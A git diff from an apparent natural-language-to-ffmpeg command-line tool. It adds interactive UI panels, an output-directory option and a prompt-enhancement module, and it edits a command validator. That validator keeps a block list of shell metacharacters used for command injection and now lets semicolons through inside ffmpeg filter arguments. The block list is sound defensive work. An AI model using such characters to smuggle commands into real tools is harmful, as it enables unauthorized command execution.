# Silently handle any errors in completion summary
|
||||
pass
|
||||
|
||||
|
||||
def _display_config_status(cfg: AppConfig) -> None:
|
||||
"""Display configuration status in a table format."""
|
||||
table = Table(
|
||||
title="[bold yellow]Configuration Status[/bold yellow]",
|
||||
show_header=False,
|
||||
box=None,
|
||||
)
|
||||
table.add_column("Setting", style="bold blue")
|
||||
table.add_column("Value", style="white")
|
||||
|
||||
# Model information
|
||||
table.add_row("AI Model", cfg.model)
|
||||
|
||||
# API key status
|
||||
api_key_status = "Configured" if cfg.openai_api_key else "Not configured"
|
||||
table.add_row("API Key", api_key_status)
|
||||
|
||||
# Other settings
|
||||
table.add_row("Timeout", f"{cfg.timeout_seconds}s")
|
||||
table.add_row("Dry Run", "Enabled" if cfg.dry_run else "Disabled")
|
||||
table.add_row("Confirm Default", "Yes" if cfg.confirm_default else "No")
|
||||
|
||||
console.print(table)
|
||||
console.print()
|
||||
|
||||
|
||||
def _display_help_tips() -> None:
|
||||
"""Display helpful tips for users."""
|
||||
tips = [
|
||||
"Try: 'convert video.mp4 to webm format'",
|
||||
"Try: 'extract audio from video.mp4'",
|
||||
"Try: 'resize video to 720p'",
|
||||
"Try: 'add subtitles to video.mp4'",
|
||||
"Type 'exit' or 'quit' to leave interactive mode",
|
||||
"Use Ctrl+C to cancel any operation",
|
||||
]
|
||||
|
||||
tip_text = Text()
|
||||
tip_text.append("Quick Tips:", style="bold white")
|
||||
tip_text.append("\n", style="dim")
|
||||
|
||||
for tip in tips:
|
||||
tip_text.append(f" {tip}\n", style="dim")
|
||||
|
||||
tip_panel = Panel(
|
||||
tip_text,
|
||||
title="[bold yellow]Quick Tips[/bold yellow]",
|
||||
border_style="yellow",
|
||||
padding=(1, 2),
|
||||
)
|
||||
|
||||
console.print(tip_panel)
|
||||
console.print()
|
||||
|
||||
|
||||
def _setup_logging(verbose: bool) -> None:
|
||||
"""Configure logging based on verbosity level.
|
||||
|
||||
Sets up Rich-based logging configuration with appropriate level and format
|
||||
for the application.
|
||||
|
||||
Args:
|
||||
verbose: If True, enables DEBUG level logging; otherwise uses INFO level
|
||||
"""
|
||||
from .logging_config.config import log_startup_info
|
||||
from .logging_config.config import setup_logging as setup_rich_logging
|
||||
|
||||
level = logging.DEBUG if verbose else logging.INFO
|
||||
logging.basicConfig(level=level, format="%(levelname)s: %(message)s")
|
||||
setup_rich_logging(level=level, console_instance=console)
|
||||
log_startup_info()
|
||||
|
||||
|
||||
def _main_impl(
|
||||
@@ -34,29 +277,53 @@ def _main_impl(
|
||||
dry_run: bool | None,
|
||||
timeout: int,
|
||||
verbose: bool,
|
||||
output_dir: str | None,
|
||||
) -> None:
|
||||
"""Initialize global options and optionally run one-shot prompt."""
|
||||
"""Initialize global options and optionally run one-shot prompt.
|
||||
|
||||
Core implementation function that handles configuration loading,
|
||||
context setup, and either executes a one-shot command or enters
|
||||
interactive mode.
|
||||
|
||||
Args:
|
||||
ctx: Typer context object (may be None for programmatic calls)
|
||||
prompt: Natural language prompt for one-shot execution
|
||||
yes: Whether to skip confirmation prompts
|
||||
model: LLM model override
|
||||
dry_run: Whether to only preview commands without execution
|
||||
timeout: LLM timeout in seconds
|
||||
verbose: Whether to enable verbose logging
|
||||
|
||||
Raises:
|
||||
typer.Exit: On successful completion or error conditions
|
||||
ConfigError: When configuration loading fails
|
||||
"""
|
||||
_setup_logging(verbose)
|
||||
try:
|
||||
# Load and validate configuration
|
||||
cfg = load_config()
|
||||
if model:
|
||||
cfg.model = model
|
||||
if dry_run is not None:
|
||||
cfg.dry_run = dry_run
|
||||
if output_dir:
|
||||
cfg.output_directory = output_dir
|
||||
cfg.timeout_seconds = timeout
|
||||
|
||||
# Store configuration in context for subcommands
|
||||
if ctx is not None:
|
||||
ctx.obj = {"config": cfg, "assume_yes": yes}
|
||||
|
||||
# One-shot if a prompt is passed to the top-level
|
||||
# Determine if this is a one-shot invocation (no subcommand specified)
|
||||
invoked_none = (ctx is None) or (ctx.invoked_subcommand is None)
|
||||
if invoked_none:
|
||||
if prompt is not None:
|
||||
try:
|
||||
context = scan()
|
||||
# Execute one-shot command: scan context, parse intent, build and execute
|
||||
context = scan(show_summary=False) # Don't show summary for one-shot commands
|
||||
client = _make_llm(cfg)
|
||||
intent = client.parse(prompt, context, timeout=cfg.timeout_seconds)
|
||||
plan = route_intent(intent)
|
||||
plan = route_intent(intent, output_dir=Path(cfg.output_directory))
|
||||
commands = build_commands(plan, assume_yes=yes)
|
||||
from .executor import preview
|
||||
from .executor import run
|
||||
@@ -74,18 +341,19 @@ def _main_impl(
|
||||
dry_run=cfg.dry_run,
|
||||
show_preview=False,
|
||||
assume_yes=yes,
|
||||
output_dir=Path(cfg.output_directory),
|
||||
)
|
||||
raise typer.Exit(code)
|
||||
except (ParseError, BuildError, ExecError) as e:
|
||||
rprint(f"[red]Error:[/red] {e}")
|
||||
console.print(f"[red]❌ Error:[/red] {e}")
|
||||
raise typer.Exit(1) from e
|
||||
else:
|
||||
# No subcommand and no prompt: enter NL interactive mode
|
||||
# No subcommand and no prompt: enter interactive mode
|
||||
if ctx is not None:
|
||||
nl(ctx=ctx, prompt=None)
|
||||
return
|
||||
except ConfigError as e:
|
||||
rprint(f"[red]Error:[/red] {e}")
|
||||
console.print(f"[red]❌ Configuration Error:[/red] {e}")
|
||||
raise typer.Exit(1) from e
|
||||
|
||||
|
||||
@@ -100,8 +368,16 @@ def cli_main(
|
||||
dry_run: bool = typer.Option(None, "--dry-run/--no-dry-run", help="Preview only"),
|
||||
timeout: int = typer.Option(60, "--timeout", help="LLM timeout seconds"),
|
||||
verbose: bool = typer.Option(False, "--verbose", help="Verbose logging"),
|
||||
output_dir: str | None = typer.Option(
|
||||
None, "--output-dir", help="Output directory for generated files"
|
||||
),
|
||||
) -> None:
|
||||
_main_impl(ctx, prompt, yes, model, dry_run, timeout, verbose)
|
||||
"""Main CLI entry point with global options.
|
||||
|
||||
Handles the top-level command line interface, setting up global options
|
||||
and delegating to the main implementation.
|
||||
"""
|
||||
_main_impl(ctx, prompt, yes, model, dry_run, timeout, verbose, output_dir)
|
||||
|
||||
|
||||
def main(
|
||||
@@ -112,19 +388,47 @@ def main(
|
||||
dry_run: bool | None = None,
|
||||
timeout: int = 60,
|
||||
verbose: bool = False,
|
||||
output_dir: str | None = None,
|
||||
) -> None:
|
||||
_main_impl(ctx, prompt, yes, model, dry_run, timeout, verbose)
|
||||
"""Programmatic entry point for the application.
|
||||
|
||||
Allows the application to be used programmatically without CLI arguments.
|
||||
Useful for testing and integration scenarios.
|
||||
|
||||
Args:
|
||||
ctx: Optional Typer context
|
||||
prompt: Natural language prompt
|
||||
yes: Skip confirmation prompts
|
||||
model: LLM model override
|
||||
dry_run: Preview only mode
|
||||
timeout: LLM timeout in seconds
|
||||
verbose: Enable verbose logging
|
||||
"""
|
||||
_main_impl(ctx, prompt, yes, model, dry_run, timeout, verbose, output_dir)
|
||||
|
||||
|
||||
def _make_llm(cfg: AppConfig) -> LLMClient:
|
||||
"""Create LLM client with secure API key handling."""
|
||||
"""Create LLM client with secure API key handling.
|
||||
|
||||
Initializes the LLM client with proper API key validation and
|
||||
provider configuration.
|
||||
|
||||
Args:
|
||||
cfg: Application configuration containing API key and model settings
|
||||
|
||||
Returns:
|
||||
Configured LLM client instance
|
||||
|
||||
Raises:
|
||||
ConfigError: When API key is invalid or missing
|
||||
"""
|
||||
try:
|
||||
# This will validate the API key format and presence
|
||||
api_key = cfg.get_api_key_for_client()
|
||||
provider = OpenAIProvider(api_key=api_key, model=cfg.model)
|
||||
return LLMClient(provider)
|
||||
except ConfigError:
|
||||
# Re-raise config errors
|
||||
# Re-raise config errors for proper error handling
|
||||
raise
|
||||
|
||||
|
||||
@@ -133,19 +437,50 @@ def nl(
|
||||
ctx: typer.Context,
|
||||
prompt: str | None = typer.Argument(None, help="Natural language prompt"),
|
||||
) -> None:
|
||||
"""Translate NL to ffmpeg, preview, confirm, and execute."""
|
||||
"""Translate NL to ffmpeg, preview, confirm, and execute.
|
||||
|
||||
Core command that handles natural language to ffmpeg command conversion.
|
||||
Supports both single command execution and interactive mode.
|
||||
|
||||
Args:
|
||||
ctx: Typer context containing configuration
|
||||
prompt: Optional natural language prompt for single execution
|
||||
|
||||
Raises:
|
||||
typer.Exit: On completion or error conditions
|
||||
"""
|
||||
obj = ctx.obj or {}
|
||||
cfg: AppConfig = obj["config"]
|
||||
assume_yes: bool = obj["assume_yes"]
|
||||
|
||||
try:
|
||||
context = scan()
|
||||
# Initialize context and LLM client
|
||||
context = scan(
|
||||
show_summary=False
|
||||
) # Don't show summary in interactive mode as it's shown separately
|
||||
client = _make_llm(cfg)
|
||||
|
||||
def handle_one(p: str) -> int:
|
||||
"""Process a single natural language prompt.
|
||||
|
||||
Parses the prompt, builds commands, shows preview, and executes
|
||||
if confirmed.
|
||||
|
||||
Args:
|
||||
p: Natural language prompt to process
|
||||
|
||||
Returns:
|
||||
Exit code from command execution
|
||||
"""
|
||||
intent = client.parse(p, context, timeout=cfg.timeout_seconds)
|
||||
plan = route_intent(intent)
|
||||
plan = route_intent(intent, output_dir=Path(cfg.output_directory))
|
||||
commands = build_commands(plan, assume_yes=assume_yes)
|
||||
|
||||
# Always show preview before asking for confirmation
|
||||
from .executor import preview
|
||||
|
||||
preview(commands)
|
||||
|
||||
confirmed = (
|
||||
True
|
||||
if assume_yes
|
||||
@@ -156,32 +491,46 @@ def nl(
|
||||
from .executor import run
|
||||
|
||||
return_code = run(
|
||||
commands, confirm=True, dry_run=cfg.dry_run, assume_yes=assume_yes
|
||||
commands,
|
||||
confirm=True,
|
||||
dry_run=cfg.dry_run,
|
||||
show_preview=False,
|
||||
assume_yes=assume_yes,
|
||||
output_dir=Path(cfg.output_directory),
|
||||
)
|
||||
else:
|
||||
from .executor import preview
|
||||
|
||||
preview(commands)
|
||||
return return_code
|
||||
|
||||
if prompt:
|
||||
# Single command execution
|
||||
code = handle_one(prompt)
|
||||
raise typer.Exit(code)
|
||||
else:
|
||||
rprint("[bold]aiclip[/bold] interactive mode. Type 'exit' to quit.")
|
||||
# Interactive mode with enhanced UI
|
||||
_display_welcome_screen()
|
||||
_display_system_info()
|
||||
_display_context_info(context, Path(cfg.output_directory))
|
||||
_display_config_status(cfg)
|
||||
_display_help_tips()
|
||||
|
||||
console.print("[bold cyan]Ready for your commands![/bold cyan]")
|
||||
console.print()
|
||||
|
||||
while True:
|
||||
try:
|
||||
line = input("> ").strip()
|
||||
line = console.input("[bold green]aiclip>[/bold green] ").strip()
|
||||
except EOFError:
|
||||
# Handle Ctrl+D gracefully
|
||||
console.print("\n[yellow]Goodbye![/yellow]")
|
||||
break
|
||||
if not line or line.lower() in {"exit", "quit"}:
|
||||
console.print("[yellow]Goodbye![/yellow]")
|
||||
break
|
||||
try:
|
||||
handle_one(line)
|
||||
except (ParseError, BuildError, ExecError) as e:
|
||||
rprint(f"[red]Error:[/red] {e}")
|
||||
console.print(f"[red]❌ Error:[/red] {e}")
|
||||
except (ConfigError, ParseError, BuildError, ExecError) as e:
|
||||
rprint(f"[red]Error:[/red] {e}")
|
||||
console.print(f"[red]❌ Error:[/red] {e}")
|
||||
raise typer.Exit(1) from e
|
||||
|
||||
|
||||
@@ -190,10 +539,115 @@ def nl(
|
||||
def explain(
|
||||
ffmpeg_command: str | None = typer.Argument(None, help="Existing ffmpeg command to explain"),
|
||||
) -> None:
|
||||
"""Explain an existing ffmpeg command in natural language.
|
||||
|
||||
Placeholder for future feature to reverse-engineer ffmpeg commands
|
||||
into human-readable explanations.
|
||||
|
||||
Args:
|
||||
ffmpeg_command: The ffmpeg command to explain
|
||||
|
||||
Raises:
|
||||
typer.Exit: When no command is provided or feature is not implemented
|
||||
"""
|
||||
if not ffmpeg_command:
|
||||
rprint("Provide an ffmpeg command to explain.")
|
||||
console.print("[red]❌ Error:[/red] Provide an ffmpeg command to explain.")
|
||||
raise typer.Exit(2)
|
||||
rprint("Explanation is not implemented in MVP.")
|
||||
console.print("[yellow]⚠️ Warning:[/yellow] Explanation is not implemented in MVP.")
|
||||
|
||||
|
||||
@app.command()
|
||||
def enhance(
|
||||
prompt: str = typer.Argument(..., help="User prompt to enhance and analyze"),
|
||||
show_suggestions: bool = typer.Option(
|
||||
True, "--suggestions/--no-suggestions", help="Show improvement suggestions"
|
||||
),
|
||||
) -> None:
|
||||
"""Enhance and analyze a user prompt for better LLM understanding.
|
||||
|
||||
Uses the prompt enhancer to improve user input and provides suggestions
|
||||
for better prompt writing.
|
||||
|
||||
Args:
|
||||
prompt: User prompt to enhance and analyze
|
||||
show_suggestions: Whether to display improvement suggestions
|
||||
|
||||
Raises:
|
||||
typer.Exit: On error conditions
|
||||
"""
|
||||
try:
|
||||
from .context_scanner_basic import scan
|
||||
from .prompt_enhancer import enhance_user_prompt
|
||||
from .prompt_enhancer import get_prompt_suggestions
|
||||
|
||||
# Enhance the prompt using context-aware processing
|
||||
context = scan()
|
||||
|
||||
enhanced = enhance_user_prompt(prompt, context)
|
||||
|
||||
# Display original and enhanced prompts in a panel
|
||||
prompt_panel = Panel(
|
||||
f"[bold]Original:[/bold] {prompt}\n\n[bold]Enhanced:[/bold] {enhanced}",
|
||||
title="[bold green]Prompt Enhancement[/bold green]",
|
||||
border_style="green",
|
||||
)
|
||||
console.print(prompt_panel)
|
||||
|
||||
# Show improvement suggestions if requested
|
||||
if show_suggestions:
|
||||
suggestions = get_prompt_suggestions(prompt)
|
||||
if suggestions:
|
||||
suggestion_table = Table(title="[bold yellow]Improvement Suggestions[/bold yellow]")
|
||||
suggestion_table.add_column("#", style="bold cyan", justify="center")
|
||||
suggestion_table.add_column("Suggestion", style="white")
|
||||
|
||||
for i, suggestion in enumerate(suggestions, 1):
|
||||
suggestion_table.add_row(str(i), suggestion)
|
||||
|
||||
console.print(suggestion_table)
|
||||
else:
|
||||
console.print("\n[green]Prompt looks good![/green]")
|
||||
|
||||
# Display available file context information in a table
|
||||
context_table = Table(title="[bold blue]Available Files[/bold blue]")
|
||||
context_table.add_column("Type", style="bold cyan", justify="center")
|
||||
context_table.add_column("Count", style="bold green", justify="center")
|
||||
context_table.add_column("Details", style="white")
|
||||
|
||||
videos = context.get("videos")
|
||||
if videos and isinstance(videos, list):
|
||||
most_recent = context.get("most_recent_video")
|
||||
most_recent_name = Path(str(most_recent)).name if most_recent else "None"
|
||||
context_table.add_row(
|
||||
"Videos",
|
||||
str(len(videos)),
|
||||
f"Most recent: {most_recent_name}",
|
||||
)
|
||||
|
||||
audios = context.get("audios")
|
||||
if audios and isinstance(audios, list):
|
||||
audio_names = [Path(str(a)).name for a in audios[:3]]
|
||||
context_table.add_row(
|
||||
"Audio",
|
||||
str(len(audios)),
|
||||
f"Files: {', '.join(audio_names)}",
|
||||
)
|
||||
|
||||
subtitle_files = context.get("subtitle_files")
|
||||
if subtitle_files and isinstance(subtitle_files, list):
|
||||
subtitle_names = [Path(str(s)).name for s in subtitle_files[:3]]
|
||||
context_table.add_row(
|
||||
"Subtitles",
|
||||
str(len(subtitle_files)),
|
||||
f"Files: {', '.join(subtitle_names)}",
|
||||
)
|
||||
|
||||
if context_table.row_count > 0:
|
||||
console.print(context_table)
|
||||
|
||||
except Exception as e:
|
||||
console.print(f"[red]❌ Error:[/red] {e}")
|
||||
raise typer.Exit(1) from e
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -29,7 +29,9 @@ if TYPE_CHECKING:
|
||||
from collections.abc import Iterable
|
||||
|
||||
|
||||
def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None) -> list[Path]:
|
||||
def expand_globs(
|
||||
patterns: Iterable[str], allowed_dirs: list[Path] | None = None
|
||||
) -> list[Path]:
|
||||
"""Expand glob patterns safely with comprehensive path validation.
|
||||
|
||||
Expands glob patterns while ensuring all resulting paths are safe and
|
||||
@@ -186,7 +188,9 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
|
||||
return False
|
||||
|
||||
# Additional check for single character paths that could be roots
|
||||
if len(original_str.strip()) <= 3 and any(c in original_str for c in ["/", "\\"]):
|
||||
if len(original_str.strip()) <= 3 and any(
|
||||
c in original_str for c in ["/", "\\"]
|
||||
):
|
||||
return False
|
||||
|
||||
# Detect path traversal attempts in path components
|
||||
@@ -212,7 +216,10 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
|
||||
path_lower = path_str.lower()
|
||||
for pattern in dangerous_patterns:
|
||||
try:
|
||||
if path_str.startswith(pattern) or Path(pattern).resolve() in resolved_path.parents:
|
||||
if (
|
||||
path_str.startswith(pattern)
|
||||
or Path(pattern).resolve() in resolved_path.parents
|
||||
):
|
||||
return False
|
||||
except (OSError, ValueError):
|
||||
# If we can't resolve the pattern, check string matching
|
||||
@@ -395,6 +402,8 @@ ALLOWED_FFMPEG_FLAGS = {
|
||||
"-s",
|
||||
"-vframes",
|
||||
"-vn",
|
||||
"-frame_pts",
|
||||
"-frame_pkt_pts",
|
||||
# Audio codecs and options
|
||||
"-c:a",
|
||||
"-acodec",
|
||||
@@ -474,9 +483,8 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
|
||||
return False
|
||||
|
||||
# Check for dangerous patterns that could cause command injection
|
||||
cmd_str = " ".join(cmd)
|
||||
# Note: semicolons are allowed in filter values (e.g., filter chains)
|
||||
dangerous_patterns = [
|
||||
";",
|
||||
"|",
|
||||
"&",
|
||||
"&&",
|
||||
@@ -493,9 +501,33 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
|
||||
"\r", # Line breaks
|
||||
]
|
||||
|
||||
for pattern in dangerous_patterns:
|
||||
if pattern in cmd_str:
|
||||
return False
|
||||
# Check for dangerous patterns, but allow semicolons in filter values
|
||||
for i, arg in enumerate(cmd):
|
||||
# Check if this is a filter value (follows a filter flag)
|
||||
is_filter_value = (
|
||||
i > 0
|
||||
and cmd[i - 1].startswith("-")
|
||||
and cmd[i - 1]
|
||||
in [
|
||||
"-vf",
|
||||
"-filter:v",
|
||||
"-af",
|
||||
"-filter:a",
|
||||
"-filter_complex",
|
||||
"-lavfi",
|
||||
]
|
||||
)
|
||||
|
||||
if is_filter_value:
|
||||
# Skip semicolon validation for filter values, but check other patterns
|
||||
patterns_to_check = [p for p in dangerous_patterns if p != ";"]
|
||||
else:
|
||||
# Check all dangerous patterns including semicolons for non-filter values
|
||||
patterns_to_check = dangerous_patterns + [";"]
|
||||
|
||||
for pattern in patterns_to_check:
|
||||
if pattern in arg:
|
||||
return False
|
||||
|
||||
# Validate flags and arguments
|
||||
i = 1 # Skip 'ffmpeg'
|
||||
371
src/ai_ffmpeg_cli/prompt_enhancer.py
Normal file
371
src/ai_ffmpeg_cli/prompt_enhancer.py
Normal file
@@ -0,0 +1,371 @@
|
||||
"""Prompt enhancement utilities for ai-ffmpeg-cli.
|
||||
|
||||
This module provides utilities to enhance and normalize user prompts
|
||||
before sending them to the LLM, improving the accuracy and consistency
|
||||
of generated ffmpeg commands.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
from typing import Any
|
||||
|
||||
|
||||
class PromptEnhancer:
|
||||
"""Enhances user prompts to improve LLM command generation accuracy.
|
||||
|
||||
This class applies pattern matching and context-aware enhancements
|
||||
to normalize user input and add missing technical details that help
|
||||
the LLM generate more accurate ffmpeg commands.
|
||||
"""
|
||||
|
||||
def __init__(self) -> None:
|
||||
"""Initialize the prompt enhancer with predefined pattern mappings.
|
||||
|
||||
Sets up regex patterns for common user expressions and their
|
||||
enhanced equivalents, along with file extension mappings for
|
||||
context-aware processing.
|
||||
"""
|
||||
# Common patterns and their enhanced versions
|
||||
self.patterns = [
|
||||
# Aspect ratio patterns
|
||||
(
|
||||
r"\b(?:make|convert|resize|scale)\s+(?:to\s+)?(\d+):(\d+)\s+(?:aspect\s+)?ratio\b",
|
||||
r"convert to \1:\2 aspect ratio",
|
||||
),
|
||||
(r"\b(\d+):(\d+)\s+(?:aspect\s+)?ratio\b", r"\1:\2 aspect ratio"),
|
||||
# Resolution patterns
|
||||
(r"\b(\d{3,4})[xX](\d{3,4})\b", r"\1x\2 resolution"),
|
||||
(r"\b(\d{3,4})p\b", r"\1p resolution"),
|
||||
# Social media platform patterns
|
||||
(
|
||||
r"\b(?:for\s+)?(?:Instagram|IG)\s+(?:Reels?|Stories?|Posts?)\b",
|
||||
r"for Instagram Reels (9:16 aspect ratio, 1080x1920)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:TikTok|Tik\s+Tok)\b",
|
||||
r"for TikTok (9:16 aspect ratio, 1080x1920)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:YouTube|YT)\s+(?:Shorts?)\b",
|
||||
r"for YouTube Shorts (9:16 aspect ratio, 1080x1920)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:YouTube|YT)\s+(?:videos?)\b",
|
||||
r"for YouTube videos (16:9 aspect ratio, 1920x1080)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:Twitter|X)\s+(?:videos?)\b",
|
||||
r"for Twitter videos (16:9 aspect ratio, 1920x1080)",
|
||||
),
|
||||
(
|
||||
r"\b(?:for\s+)?(?:Facebook|FB)\s+(?:videos?)\b",
|
||||
r"for Facebook videos (16:9 aspect ratio, 1920x1080)",
|
||||
),
|
||||
# Quality patterns
|
||||
(r"\b(?:high|good|better)\s+quality\b", r"high quality (lower CRF value)"),
|
||||
(
|
||||
r"\b(?:low|small|compressed)\s+(?:file\s+)?size\b",
|
||||
r"small file size (higher CRF value)",
|
||||
),
|
||||
(r"\b(?:compress|reduce\s+size)\b", r"compress for smaller file size"),
|
||||
# Audio patterns
|
||||
(r"\b(?:remove|delete|strip)\s+audio\b", r"remove audio track"),
|
||||
(r"\b(?:extract|get)\s+audio\b", r"extract audio to separate file"),
|
||||
(r"\b(?:mute|silence)\b", r"remove audio track"),
|
||||
# Video patterns
|
||||
(
|
||||
r"\b(?:trim|cut)\s+(?:from|at)\s+(\d+(?:\.\d+)?)\s+(?:to|until)\s+(\d+(?:\.\d+)?)\b",
|
||||
r"trim from \1 seconds to \2 seconds",
|
||||
),
|
||||
(
|
||||
r"\b(?:trim|cut)\s+(?:from|at)\s+(\d+:\d+:\d+(?:\.\d+)?)\s+(?:to|until)\s+(\d+:\d+:\d+(?:\.\d+)?)\b",
|
||||
r"trim from \1 to \2",
|
||||
),
|
||||
(r"\b(?:speed\s+up|fast|faster)\b", r"increase playback speed"),
|
||||
(r"\b(?:slow\s+down|slow|slower)\b", r"decrease playback speed"),
|
||||
# Subtitle patterns
|
||||
(
|
||||
r"\b(?:add|burn|embed)\s+(?:captions?|subtitles?)\b",
|
||||
r"burn in subtitles",
|
||||
),
|
||||
(
|
||||
r"\b(?:hardcode|hard\s+code)\s+(?:captions?|subtitles?)\b",
|
||||
r"burn in subtitles",
|
||||
),
|
||||
(r"\b(?:soft\s+)?subtitles?\b", r"subtitles"),
|
||||
# Format patterns
|
||||
(
|
||||
r"\b(?:convert\s+to|save\s+as)\s+(mp4|avi|mov|mkv|webm)\b",
|
||||
r"convert to \1 format",
|
||||
),
|
||||
# Common shortcuts
|
||||
(
|
||||
r"\b(?:make\s+it\s+)?vertical\b",
|
||||
r"convert to 9:16 aspect ratio (vertical)",
|
||||
),
|
||||
(
|
||||
r"\b(?:make\s+it\s+)?horizontal\b",
|
||||
r"convert to 16:9 aspect ratio (horizontal)",
|
||||
),
|
||||
(r"\b(?:make\s+it\s+)?square\b", r"convert to 1:1 aspect ratio (square)"),
|
||||
(r"\b(?:crop|fill)\s+(?:to\s+)?(\d+:\d+)\b", r"crop to \1 aspect ratio"),
|
||||
(r"\b(?:pad|letterbox)\s+(?:to\s+)?(\d+:\d+)\b", r"pad to \1 aspect ratio"),
|
||||
# Duration patterns
|
||||
(
|
||||
r"\b(\d+)\s+(?:second|sec)s?\s+(?:animated\s+)?gif\b",
|
||||
r"\1 second duration animated gif",
|
||||
),
|
||||
(
|
||||
r"\b(\d+)\s+(?:second|sec)s?\s+(?:long\s+)?(?:video|clip)\b",
|
||||
r"\1 second duration video",
|
||||
),
|
||||
(
|
||||
r"\b(\d+)\s+(?:second|sec)s?\s+(?:duration|length)\b",
|
||||
r"\1 second duration",
|
||||
),
|
||||
(
|
||||
r"\b(?:for|with)\s+(\d+)\s+(?:second|sec)s?\b",
|
||||
r"with \1 second duration",
|
||||
),
|
||||
(r"\b(\d+)s\s+(?:animated\s+)?gif\b", r"\1 second duration animated gif"),
|
||||
(r"\b(\d+)s\s+(?:long\s+)?(?:video|clip)\b", r"\1 second duration video"),
|
||||
]
|
||||
|
||||
# File extension patterns for better context
|
||||
self.file_extensions = {
|
||||
"video": [".mp4", ".avi", ".mov", ".mkv", ".webm", ".flv", ".wmv", ".m4v"],
|
||||
"audio": [".mp3", ".wav", ".aac", ".flac", ".ogg", ".m4a", ".wma"],
|
||||
"image": [".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tiff", ".webp"],
|
||||
"subtitle": [".srt", ".ass", ".ssa", ".vtt", ".sub"],
|
||||
}
|
||||
|
||||
def enhance_prompt(self, prompt: str, context: dict[str, Any]) -> str:
|
||||
"""Enhance a user prompt to improve LLM understanding.
|
||||
|
||||
Applies a series of transformations to normalize user input and add
|
||||
context-aware details that help the LLM generate more accurate
|
||||
ffmpeg commands.
|
||||
|
||||
Args:
|
||||
prompt: Original user prompt string
|
||||
context: Dictionary containing file context information (videos,
|
||||
audios, subtitle_files, etc.)
|
||||
|
||||
Returns:
|
||||
Enhanced prompt string with improved clarity and specificity
|
||||
|
||||
Side effects:
|
||||
None - this is a pure function
|
||||
"""
|
||||
enhanced = prompt.strip()
|
||||
|
||||
# Apply pattern replacements in order of specificity
|
||||
for pattern, replacement in self.patterns:
|
||||
enhanced = re.sub(pattern, replacement, enhanced, flags=re.IGNORECASE)
|
||||
|
||||
# Add context-aware enhancements based on available files
|
||||
enhanced = self._add_context_enhancements(enhanced, context)
|
||||
|
||||
# Add missing technical details that would help the LLM
|
||||
enhanced = self._add_missing_details(enhanced)
|
||||
|
||||
# Normalize common terms for consistency
|
||||
enhanced = self._normalize_terms(enhanced)
|
||||
|
||||
return enhanced.strip()
|
||||
|
||||
def _add_context_enhancements(self, prompt: str, context: dict[str, Any]) -> str:
|
||||
"""Add context-aware enhancements based on available files.
|
||||
|
||||
Analyzes the context dictionary to identify available files and
|
||||
adds relevant information to the prompt when appropriate.
|
||||
|
||||
Args:
|
||||
prompt: Current enhanced prompt
|
||||
context: File context dictionary
|
||||
|
||||
Returns:
|
||||
Prompt with context-specific enhancements added
|
||||
"""
|
||||
enhancements = []
|
||||
|
||||
# Check for video files and add context if relevant
|
||||
if context.get("videos"):
|
||||
video_files = context["videos"]
|
||||
if len(video_files) == 1:
|
||||
enhancements.append(f"using video file: {video_files[0]}")
|
||||
elif len(video_files) > 1:
|
||||
enhancements.append(f"using one of {len(video_files)} available video files")
|
||||
|
||||
# Check for subtitle files when subtitle operations are mentioned
|
||||
if context.get("subtitle_files"):
|
||||
subtitle_files = context["subtitle_files"]
|
||||
if "subtitle" in prompt.lower() or "caption" in prompt.lower():
|
||||
if len(subtitle_files) == 1:
|
||||
enhancements.append(f"using subtitle file: {subtitle_files[0]}")
|
||||
elif len(subtitle_files) > 1:
|
||||
enhancements.append(
|
||||
f"using one of {len(subtitle_files)} available subtitle files"
|
||||
)
|
||||
|
||||
# Check for audio files when audio operations are mentioned
|
||||
if context.get("audios"):
|
||||
audio_files = context["audios"]
|
||||
if "audio" in prompt.lower() and len(audio_files) > 0:
|
||||
enhancements.append(f"using one of {len(audio_files)} available audio files")
|
||||
|
||||
# Append all enhancements to the prompt
|
||||
if enhancements:
|
||||
prompt += f" ({', '.join(enhancements)})"
|
||||
|
||||
return prompt
|
||||
|
||||
def _add_missing_details(self, prompt: str) -> str:
|
||||
"""Add missing technical details that would help the LLM.
|
||||
|
||||
Identifies common scenarios where additional technical specifications
|
||||
would improve command generation accuracy.
|
||||
|
||||
Args:
|
||||
prompt: Current enhanced prompt
|
||||
|
||||
Returns:
|
||||
Prompt with missing details added as suggestions
|
||||
"""
|
||||
details = []
|
||||
|
||||
# Suggest resolution when aspect ratio is mentioned but no resolution specified
|
||||
if re.search(r"\b\d+:\d+\s+aspect\s+ratio\b", prompt, re.IGNORECASE):
|
||||
if "9:16" in prompt and "resolution" not in prompt.lower():
|
||||
details.append("suggest 1080x1920 resolution")
|
||||
elif "16:9" in prompt and "resolution" not in prompt.lower():
|
||||
details.append("suggest 1920x1080 resolution")
|
||||
elif "1:1" in prompt and "resolution" not in prompt.lower():
|
||||
details.append("suggest 1080x1080 resolution")
|
||||
|
||||
# Suggest CRF values when quality is mentioned but no specific settings
|
||||
if "quality" in prompt.lower() and "crf" not in prompt.lower():
|
||||
if "high" in prompt.lower():
|
||||
details.append("use CRF 18-23 for high quality")
|
||||
elif "low" in prompt.lower() or "small" in prompt.lower():
|
||||
details.append("use CRF 28-32 for smaller file size")
|
||||
|
||||
# Suggest codec when format conversion is mentioned but no codec specified
|
||||
if (
|
||||
any(ext in prompt.lower() for ext in [".mp4", ".avi", ".mov", ".mkv"])
|
||||
and "codec" not in prompt.lower()
|
||||
):
|
||||
details.append("use appropriate codec for target format")
|
||||
|
||||
# Append all details to the prompt
|
||||
if details:
|
||||
prompt += f" ({', '.join(details)})"
|
||||
|
||||
return prompt
|
||||
|
||||
def _normalize_terms(self, prompt: str) -> str:
|
||||
"""Normalize common terms for consistency.
|
||||
|
||||
Standardizes formatting and expands common abbreviations to
|
||||
improve LLM understanding.
|
||||
|
||||
Args:
|
||||
